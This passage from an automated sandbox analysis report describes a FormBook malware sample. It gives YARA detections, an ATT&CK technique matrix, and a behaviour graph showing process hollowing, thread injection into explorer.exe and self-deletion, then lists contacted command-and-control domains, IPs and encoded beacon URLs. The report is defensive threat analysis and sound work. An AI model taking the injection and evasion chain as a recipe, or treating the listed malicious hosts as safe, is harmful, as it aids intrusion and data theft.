            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information:

            barindex
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 3.2.iAuPyHuUkk.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.iAuPyHuUkk.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.iAuPyHuUkk.exe.45ef360.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000D.00000002.619163959.0000000002FE0000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.455602320.0000000001930000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.619272890.0000000003010000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.454131267.00000000015D0000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.371245810.00000000043C9000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000000.400507122.00000000075B9000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000000.421546178.00000000075B9000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.617454019.00000000009B0000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.453689507.0000000000400000.00000040.00000001.sdmp, type: MEMORY

            Remote Access Functionality:

            barindex
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 3.2.iAuPyHuUkk.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.iAuPyHuUkk.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.iAuPyHuUkk.exe.45ef360.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000D.00000002.619163959.0000000002FE0000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.455602320.0000000001930000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.619272890.0000000003010000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.454131267.00000000015D0000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.371245810.00000000043C9000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000000.400507122.00000000075B9000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000000.421546178.00000000075B9000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.617454019.00000000009B0000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.453689507.0000000000400000.00000040.00000001.sdmp, type: MEMORY

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid AccountsShared Modules1Path InterceptionProcess Injection512Masquerading1OS Credential DumpingSecurity Software Discovery221Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemoryProcess Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion31Security Account ManagerVirtualization/Sandbox Evasion31SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection512NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol12SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptObfuscated Files or Information3LSA SecretsSystem Information Discovery112SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.commonSoftware Packing13Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup ItemsFile Deletion1DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 signatures2 2 Behavior Graph ID: 501991 Sample: iAuPyHuUkk Startdate: 13/10/2021 Architecture: WINDOWS Score: 100 38 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->38 40 Found malware configuration 2->40 42 Malicious sample detected (through community Yara rule) 2->42 44 7 other signatures 2->44 10 iAuPyHuUkk.exe 6 2->10         started        process3 file4 30 C:\Users\user\AppData\...\iAuPyHuUkk.exe.log, ASCII 10->30 dropped 56 Tries to detect virtualization through RDTSC time measurements 10->56 14 iAuPyHuUkk.exe 10->14         started        signatures5 process6 signatures7 58 Modifies the context of a thread in another process (thread injection) 14->58 60 Maps a DLL or memory area into another process 14->60 62 Sample uses process hollowing technique 14->62 64 Queues an APC in another process (thread injection) 14->64 17 explorer.exe 14->17 injected process8 dnsIp9 32 www.cyebang.com 154.216.110.149, 49827, 80 POWERLINE-AS-APPOWERLINEDATACENTERHK Seychelles 17->32 34 www.xn--aprendes-espaol-brb.com 217.160.0.226, 49826, 80 ONEANDONE-ASBrauerstrasse48DE Germany 17->34 36 5 other IPs or domains 17->36 46 System process connects to network (likely due to code injection or exploit) 17->46 21 control.exe 17->21         started        24 autofmt.exe 17->24         started        signatures10 process11 signatures12 48 Self deletion via cmd delete 21->48 50 Modifies the context of a thread in another process (thread injection) 21->50 52 Maps a DLL or memory area into another process 21->52 54 Tries to detect virtualization through RDTSC time measurements 21->54 26 cmd.exe 1 21->26         started        process13 process14 28 conhost.exe 26->28         started       

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.

            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            iAuPyHuUkk.exe15%ReversingLabs

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            SourceDetectionScannerLabelLinkDownload
            3.2.iAuPyHuUkk.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            http://i4.cdn-image.com/__media__/pics/27586/searchbtn.png)0%Avira URL Cloudsafe
            http://i4.cdn-image.com/__media__/fonts/open-sans/open-sans.svg#open-sans0%Avira URL Cloudsafe
            http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
            http://i4.cdn-image.com/__media__/fonts/open-sans/open-sans.woff0%Avira URL Cloudsafe
            http://www.vintagepaseo.com/display.cfm0%Avira URL Cloudsafe
            http://i4.cdn-image.com/__media__/pics/27587/Left.png)0%Avira URL Cloudsafe
            http://i4.cdn-image.com/__media__/fonts/open-sans/open-sans.eot0%Avira URL Cloudsafe
            http://www.tiro.com0%URL Reputationsafe
            http://www.jiyu-kobo.co.jp//e0%Avira URL Cloudsafe
            http://www.goodfont.co.kr0%URL Reputationsafe
            http://www.carterandcone.com0%URL Reputationsafe
            http://www.cyebang.com/mexq/?e66HNDO=g6L0/Z2eA1jwRGo1l6rXBhzWGtzMcF3Ol1vrZIbNMV/6CHuR9YyStXwolwULrpYmw34wy4pkGQ==&6lux=TrTPmvux5100%Avira URL Cloudmalware
            http://i4.cdn-image.com/__media__/pics/27587/Right.png)0%Avira URL Cloudsafe
            http://www.collada.org/2005/11/COLLADASchema9Done0%URL Reputationsafe
            http://www.sajatypeworks.com0%URL Reputationsafe
            http://www.zhongyicts.com.cnava0%Avira URL Cloudsafe
            http://www.typography.netD0%URL Reputationsafe
            http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
            http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
            http://fontfabrik.com0%URL Reputationsafe
            http://i4.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.woff20%Avira URL Cloudsafe
            http://www.ascendercorp.com/typedesigners.html90%Avira URL Cloudsafe
            http://i4.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.eot0%Avira URL Cloudsafe
            http://www.carterandcone.com80%URL Reputationsafe
            http://i4.cdn-image.com/__media__/fonts/open-sans/open-sans.otf0%Avira URL Cloudsafe
            http://i4.cdn-image.com/__media__/pics/468/netsol-favicon-2020.jpg0%Avira URL Cloudsafe
            http://i4.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.otf0%Avira URL Cloudsafe
            http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
            http://www.fontbureau.comgrito0%URL Reputationsafe
            http://i4.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.eot?#iefix0%Avira URL Cloudsafe
            http://www.sandoll.co.kr0%URL Reputationsafe
            http://i4.cdn-image.com/__media__/pics/27587/BG_2.png)0%Avira URL Cloudsafe
            http://www.urwpp.deDPlease0%URL Reputationsafe
            http://www.vintagepaseo.com/All_Inclusive_Vacation_Packages.cfm?fp=DaDrTtodEbKG7H0GzLA3PtWLrM%2BdgeV0%Avira URL Cloudsafe
            http://i4.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.svg#open-sans-bold0%Avira URL Cloudsafe
            http://www.zhongyicts.com.cn0%URL Reputationsafe
            http://www.sakkal.com0%URL Reputationsafe
            http://www.vintagepaseo.com/__media__/design/underconstructionnotice.php?d=vintagepaseo.com0%Avira URL Cloudsafe
            http://www.vintagepaseo.com/mexq/?e66HNDO=NdiAijP1TUDTbxv0%Avira URL Cloudsafe
            http://www.carterandcone.como.Z0%Avira URL Cloudsafe
            http://www.galapagosdesign.com/0%URL Reputationsafe
            http://www.carterandcone.como.N0%Avira URL Cloudsafe
            http://www.carterandcone.comTC0%URL Reputationsafe
            http://www.vintagepaseo.com/__media__/js/trademark.php?d=vintagepaseo.com&type=ns0%Avira URL Cloudsafe
            http://www.vintagepaseo.com/mexq/?e66HNDO=NdiAijP1TUDTbxv+UVf96WWBcfe2HF0RhGf6TXdRPwqQZT7SHaZsoP4NORlVjEEjxsHi13Lz5g==&6lux=TrTPmvux50%Avira URL Cloudsafe
            http://www.vintagepaseo.com/Migraine_Pain_Relief.cfm?fp=DaDrTtodEbKG7H0GzLA3PtWLrM%2BdgeVzyxLURkW8zf0%Avira URL Cloudsafe
            http://i4.cdn-image.com/__media__/fonts/open-sans/open-sans.woff20%Avira URL Cloudsafe
            http://www.fontbureau.coma0%URL Reputationsafe
            http://www.fontbureau.come.com0%URL Reputationsafe
            http://en.w0%URL Reputationsafe
            http://www.vintagepaseo.com/Top_10_Luxury_Cars.cfm?fp=DaDrTtodEbKG7H0GzLA3PtWLrM%2BdgeVzyxLURkW8zfJI0%Avira URL Cloudsafe
            http://www.carterandcone.coml0%URL Reputationsafe
            http://i4.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.woff0%Avira URL Cloudsafe
            http://www.founder.com.cn/cn0%URL Reputationsafe
            http://i4.cdn-image.com/__media__/pics/10667/netsol-logos-2020-165-50.jpg0%Avira URL Cloudsafe
            http://www.founder.com.cn/cn70%Avira URL Cloudsafe
            http://www.jiyu-kobo.co.jp/ico0%Avira URL Cloudsafe
            http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
            http://i4.cdn-image.com/__media__/fonts/open-sans/open-sans.ttf0%Avira URL Cloudsafe
            http://i4.cdn-image.com/__media__/js/min.js?v2.30%Avira URL Cloudsafe
            http://www.Vintagepaseo.com0%Avira URL Cloudsafe
            http://www.vintagepaseo.com/Work_from_Home.cfm?fp=DaDrTtodEbKG7H0GzLA3PtWLrM%2BdgeVzyxLURkW8zfJIpKi%0%Avira URL Cloudsafe
            http://i4.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.ttf0%Avira URL Cloudsafe
            http://www.tiro.comc0%URL Reputationsafe
            http://www.vintagepaseo.com/Credit_Card_Application.cfm?fp=DaDrTtodEbKG7H0GzLA3PtWLrM%2BdgeVzyxLURkW0%Avira URL Cloudsafe
            http://www.xn--aprendes-espaol-brb.com/mexq/?e66HNDO=aPMuX7G1Ot9XJXghMAabXwwkzBWzprGcmmQ5cfrgMP5E/C43hf1Uz5bqYekFv+cUss1JtU0p5g==&6lux=TrTPmvux50%Avira URL Cloudsafe
            http://i4.cdn-image.com/__media__/fonts/open-sans/open-sans.eot?#iefix0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            www.vintagepaseo.com
            208.91.197.27
            truetrue
              unknown
              windowsupdate.s.llnwi.net
              178.79.242.0
              truefalse
                unknown
                www.cyebang.com
                154.216.110.149
                truetrue
                  unknown
                  www.xn--aprendes-espaol-brb.com
                  217.160.0.226
                  truetrue
                    unknown
                    www.brandmty.net
                    unknown
                    unknowntrue
                      unknown
                      www.districonio.com
                      unknown
                      unknowntrue
                        unknown
                        www.iphone13promax.design
                        unknown
                        unknowntrue
                          unknown
                          www.umdasch-lagertechnik.com
                          unknown
                          unknowntrue
                            unknown

                            Contacted URLs

                            NameMaliciousAntivirus DetectionReputation
                            http://www.cyebang.com/mexq/?e66HNDO=g6L0/Z2eA1jwRGo1l6rXBhzWGtzMcF3Ol1vrZIbNMV/6CHuR9YyStXwolwULrpYmw34wy4pkGQ==&6lux=TrTPmvux5true
                            • Avira URL Cloud: malware
                            unknown
                            http://www.vintagepaseo.com/mexq/?e66HNDO=NdiAijP1TUDTbxv+UVf96WWBcfe2HF0RhGf6TXdRPwqQZT7SHaZsoP4NORlVjEEjxsHi13Lz5g==&6lux=TrTPmvux5true
                            • Avira URL Cloud: safe
                            unknown
                            http://www.xn--aprendes-espaol-brb.com/mexq/?e66HNDO=aPMuX7G1Ot9XJXghMAabXwwkzBWzprGcmmQ5cfrgMP5E/C43hf1Uz5bqYekFv+cUss1JtU0p5g==&6lux=TrTPmvux5true
                            • Avira URL Cloud: safe
                            unknown

                            URLs from Memory and Binaries

                            NameSourceMaliciousAntivirus DetectionReputation
                            http://i4.cdn-image.com/__media__/pics/27586/searchbtn.png)control.exe, 0000000D.00000002.623085795.0000000005222000.00000004.00020000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://www.fontbureau.com/designersGiAuPyHuUkk.exe, 00000000.00000002.374306754.0000000007632000.00000004.00000001.sdmpfalse
                              high
                              http://www.fontbureau.com/designers/?iAuPyHuUkk.exe, 00000000.00000002.374306754.0000000007632000.00000004.00000001.sdmpfalse
                                high
                                http://i4.cdn-image.com/__media__/fonts/open-sans/open-sans.svg#open-sanscontrol.exe, 0000000D.00000002.623085795.0000000005222000.00000004.00020000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://www.founder.com.cn/cn/bTheiAuPyHuUkk.exe, 00000000.00000002.374306754.0000000007632000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://i4.cdn-image.com/__media__/fonts/open-sans/open-sans.woffcontrol.exe, 0000000D.00000002.623085795.0000000005222000.00000004.00020000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://www.fontbureau.com/designers?iAuPyHuUkk.exe, 00000000.00000002.374306754.0000000007632000.00000004.00000001.sdmpfalse
                                  high
                                  http://www.vintagepaseo.com/display.cfmcontrol.exe, 0000000D.00000002.623085795.0000000005222000.00000004.00020000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://i4.cdn-image.com/__media__/pics/27587/Left.png)control.exe, 0000000D.00000002.623085795.0000000005222000.00000004.00020000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://i4.cdn-image.com/__media__/fonts/open-sans/open-sans.eotcontrol.exe, 0000000D.00000002.623085795.0000000005222000.00000004.00020000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.tiro.comiAuPyHuUkk.exe, 00000000.00000002.374306754.0000000007632000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://www.jiyu-kobo.co.jp//eiAuPyHuUkk.exe, 00000000.00000003.356809430.0000000006368000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.fontbureau.com/designersiAuPyHuUkk.exe, 00000000.00000002.374306754.0000000007632000.00000004.00000001.sdmpfalse
                                    high
                                    http://push.zhanzhang.baidu.com/push.jscontrol.exe, 0000000D.00000002.623085795.0000000005222000.00000004.00020000.sdmpfalse
                                      high
                                      http://www.goodfont.co.kriAuPyHuUkk.exe, 00000000.00000002.374306754.0000000007632000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://www.carterandcone.comiAuPyHuUkk.exe, 00000000.00000003.355148904.0000000006366000.00000004.00000001.sdmp, iAuPyHuUkk.exe, 00000000.00000003.355959860.0000000006365000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://i4.cdn-image.com/__media__/pics/27587/Right.png)control.exe, 0000000D.00000002.623085795.0000000005222000.00000004.00020000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.collada.org/2005/11/COLLADASchema9DoneiAuPyHuUkk.exe, 00000000.00000002.370703013.00000000033F7000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://www.sajatypeworks.comiAuPyHuUkk.exe, 00000000.00000002.374306754.0000000007632000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://www.zhongyicts.com.cnavaiAuPyHuUkk.exe, 00000000.00000003.355148904.0000000006366000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.typography.netDiAuPyHuUkk.exe, 00000000.00000002.374306754.0000000007632000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://www.founder.com.cn/cn/cTheiAuPyHuUkk.exe, 00000000.00000002.374306754.0000000007632000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://www.galapagosdesign.com/staff/dennis.htmiAuPyHuUkk.exe, 00000000.00000002.373816702.0000000006360000.00000004.00000001.sdmp, iAuPyHuUkk.exe, 00000000.00000002.374306754.0000000007632000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://fontfabrik.comiAuPyHuUkk.exe, 00000000.00000002.374306754.0000000007632000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://i4.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.woff2control.exe, 0000000D.00000002.623085795.0000000005222000.00000004.00020000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.ascendercorp.com/typedesigners.html9iAuPyHuUkk.exe, 00000000.00000003.357814039.000000000639D000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://i4.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.eotcontrol.exe, 0000000D.00000002.623085795.0000000005222000.00000004.00020000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.carterandcone.com8iAuPyHuUkk.exe, 00000000.00000003.355959860.0000000006365000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://i4.cdn-image.com/__media__/fonts/open-sans/open-sans.otfcontrol.exe, 0000000D.00000002.623085795.0000000005222000.00000004.00020000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://i4.cdn-image.com/__media__/pics/468/netsol-favicon-2020.jpgcontrol.exe, 0000000D.00000002.623085795.0000000005222000.00000004.00020000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://i4.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.otfcontrol.exe, 0000000D.00000002.623085795.0000000005222000.00000004.00020000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.galapagosdesign.com/DPleaseiAuPyHuUkk.exe, 00000000.00000002.374306754.0000000007632000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://www.fontbureau.comgritoiAuPyHuUkk.exe, 00000000.00000002.373816702.0000000006360000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://i4.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.eot?#iefixcontrol.exe, 0000000D.00000002.623085795.0000000005222000.00000004.00020000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.fonts.comiAuPyHuUkk.exe, 00000000.00000003.351807780.000000000637B000.00000004.00000001.sdmpfalse
                                        high
                                        http://www.sandoll.co.kriAuPyHuUkk.exe, 00000000.00000002.374306754.0000000007632000.00000004.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        http://i4.cdn-image.com/__media__/pics/27587/BG_2.png)control.exe, 0000000D.00000002.623085795.0000000005222000.00000004.00020000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.urwpp.deDPleaseiAuPyHuUkk.exe, 00000000.00000002.374306754.0000000007632000.00000004.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        http://www.vintagepaseo.com/All_Inclusive_Vacation_Packages.cfm?fp=DaDrTtodEbKG7H0GzLA3PtWLrM%2BdgeVcontrol.exe, 0000000D.00000002.623085795.0000000005222000.00000004.00020000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://i4.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.svg#open-sans-boldcontrol.exe, 0000000D.00000002.623085795.0000000005222000.00000004.00020000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.zhongyicts.com.cniAuPyHuUkk.exe, 00000000.00000002.374306754.0000000007632000.00000004.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        https://hm.baidu.com/hm.js?8518669f0d31e41508be0babf5a8fc28control.exe, 0000000D.00000002.623085795.0000000005222000.00000004.00020000.sdmpfalse
                                          high
                                          http://www.sakkal.comiAuPyHuUkk.exe, 00000000.00000003.357744601.0000000006395000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://www.vintagepaseo.com/__media__/design/underconstructionnotice.php?d=vintagepaseo.comcontrol.exe, 0000000D.00000002.623085795.0000000005222000.00000004.00020000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.vintagepaseo.com/mexq/?e66HNDO=NdiAijP1TUDTbxvcontrol.exe, 0000000D.00000002.623085795.0000000005222000.00000004.00020000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.carterandcone.como.ZiAuPyHuUkk.exe, 00000000.00000003.355148904.0000000006366000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000005.00000000.393239210.000000000095C000.00000004.00000020.sdmpfalse
                                            high
                                            http://www.apache.org/licenses/LICENSE-2.0iAuPyHuUkk.exe, 00000000.00000002.374306754.0000000007632000.00000004.00000001.sdmpfalse
                                              high
                                              http://www.fontbureau.comiAuPyHuUkk.exe, 00000000.00000002.374306754.0000000007632000.00000004.00000001.sdmpfalse
                                                high
                                                http://www.galapagosdesign.com/iAuPyHuUkk.exe, 00000000.00000003.362371401.0000000006395000.00000004.00000001.sdmp, iAuPyHuUkk.exe, 00000000.00000003.362345727.0000000006395000.00000004.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                http://www.carterandcone.como.NiAuPyHuUkk.exe, 00000000.00000003.355148904.0000000006366000.00000004.00000001.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.fontbureau.com/designers/cabarga.htmlliAuPyHuUkk.exe, 00000000.00000003.360703238.0000000006395000.00000004.00000001.sdmpfalse
                                                  high
                                                  http://www.carterandcone.comTCiAuPyHuUkk.exe, 00000000.00000003.355148904.0000000006366000.00000004.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://www.vintagepaseo.com/__media__/js/trademark.php?d=vintagepaseo.com&type=nscontrol.exe, 0000000D.00000002.623085795.0000000005222000.00000004.00020000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://zz.bdstatic.com/linksubmit/push.jscontrol.exe, 0000000D.00000002.623085795.0000000005222000.00000004.00020000.sdmpfalse
                                                    high
                                                    http://www.vintagepaseo.com/Migraine_Pain_Relief.cfm?fp=DaDrTtodEbKG7H0GzLA3PtWLrM%2BdgeVzyxLURkW8zfcontrol.exe, 0000000D.00000002.623085795.0000000005222000.00000004.00020000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://i4.cdn-image.com/__media__/fonts/open-sans/open-sans.woff2control.exe, 0000000D.00000002.623085795.0000000005222000.00000004.00020000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.fontbureau.comaiAuPyHuUkk.exe, 00000000.00000002.373816702.0000000006360000.00000004.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://www.fontbureau.come.comiAuPyHuUkk.exe, 00000000.00000002.373816702.0000000006360000.00000004.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://en.wiAuPyHuUkk.exe, 00000000.00000003.355959860.0000000006365000.00000004.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://www.vintagepaseo.com/Top_10_Luxury_Cars.cfm?fp=DaDrTtodEbKG7H0GzLA3PtWLrM%2BdgeVzyxLURkW8zfJIcontrol.exe, 0000000D.00000002.623085795.0000000005222000.00000004.00020000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.carterandcone.comliAuPyHuUkk.exe, 00000000.00000003.355148904.0000000006366000.00000004.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://i4.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.woffcontrol.exe, 0000000D.00000002.623085795.0000000005222000.00000004.00020000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.fontbureau.com/designers/cabarga.htmlNiAuPyHuUkk.exe, 00000000.00000002.374306754.0000000007632000.00000004.00000001.sdmpfalse
                                                      high
                                                      http://www.founder.com.cn/cniAuPyHuUkk.exe, 00000000.00000002.374306754.0000000007632000.00000004.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://i4.cdn-image.com/__media__/pics/10667/netsol-logos-2020-165-50.jpgcontrol.exe, 0000000D.00000002.623085795.0000000005222000.00000004.00020000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.fontbureau.com/designers/frere-jones.htmliAuPyHuUkk.exe, 00000000.00000003.360377419.0000000006395000.00000004.00000001.sdmp, iAuPyHuUkk.exe, 00000000.00000002.374306754.0000000007632000.00000004.00000001.sdmpfalse
                                                        high
                                                        http://www.fontbureau.com/designers/cabarga.htmliAuPyHuUkk.exe, 00000000.00000003.360703238.0000000006395000.00000004.00000001.sdmpfalse
                                                          high
                                                          http://www.founder.com.cn/cn7iAuPyHuUkk.exe, 00000000.00000003.354702125.000000000636B000.00000004.00000001.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
